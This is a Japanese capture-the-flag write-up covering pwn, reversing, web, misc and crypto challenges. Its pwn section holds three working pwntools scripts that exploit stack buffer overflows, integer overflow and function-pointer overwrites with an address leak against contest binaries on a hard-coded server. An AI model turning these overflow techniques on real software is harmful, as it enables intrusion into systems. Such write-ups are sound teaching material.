Pwn

pwn monster 1

monsterと戦える

自明なbofがあるので,自分のモンスターのステータスを上書きして最強にする

#!/usr/bin/env python3
from pwn import *
binfile = 'vuln'
context.log_level = 'critical'
e = ELF(binfile)
context.binary = binfile
io = remote('35.200.120.35', 9001)

io.sendlineafter(b'Key', b'')
io.sendlineafter(b'World!', b'')
io.sendlineafter(b'monster!', b'')

payload = b'a' * 16 + pack(9223372036854775807) + pack(9223372036854775807)

io.sendlineafter(b'name!', payload)

io.interactive()

pwn monster 2

checksumが付いた.

デフォルトでhp+attackが110なので,合計が110にならないと怒られる

いい感じに敵の体力をoverflowさせる

#!/usr/bin/env python3
from pwn import *
binfile = 'vuln'
context.log_level = 'critical'
e = ELF(binfile)
context.binary = binfile
io = remote('35.200.120.35', 9002)

payload = b'a' * 16 + pack(9223372036854775807) + pack(-9223372036854775697)


io.sendlineafter(b'name', payload)

io.interactive()

pwn monster 3

関数ポインタが増えたので上書きする

#!/usr/bin/env python3
from pwn import *
binfile = 'vuln'
context.log_level = 'critical'
e = ELF(binfile)
context.binary = binfile
io = remote('35.200.120.35', 9003)

for _ in range(15):
    io.readline()

cry_addr = int(io.readline().split()[2], 16)

show_flag = cry_addr - e.sym['my_monster_cry'] + e.sym['show_flag']

payload = b'a' * 16 + pack(show_flag) * 3

io.sendlineafter(b'name:', payload)

io.interactive()

Rev

protected

stringsで出る

Web

web_meta

grepで出る

long flag

vimでspanタグ消したら出た

Misc

Excel

unzipしてgrepしたら出た

image_conv

stegsolveでガチャガチャしてたら出た

Crypto

Caesar Cipher

問題名の通り

ord_xor

#!/usr/bin/env python3

enc = 'nhtjcZcsfroydRx`rl'
dec = ''

for i, c in enumerate(enc):
    tmp = ord(c)
    for _ in range(i):
        tmp ^= i
    dec += chr(tmp)

print(dec)

tanitu_kanji

bit全探索

#!/usr/bin/env python3
alphabets = "abcdefghijklmnopqrstuvwxyz0123456789{}_"
after1 = "fl38ztrx6q027k9e5su}dwp{o_bynhm14aicjgv"
after2 = "rho5b3k17pi_eytm2f94ujxsdvgcwl{}a086znq"


def conv(s: str, table: str) -> str:
    res = ""
    for c in s:
        i = table.index(c)
        res += alphabets[i]
    return res


for i in range(1024):
    flag = "l0d0pipdave0dia244im6fsp8x"
    for f in format(i, '010b'):
        if f == "1":
            flag = conv(flag, after1)
        else:
            flag = conv(flag, after2)
    if flag.startswith('nitic_ctf{'):
        print(flag)
        exit(0)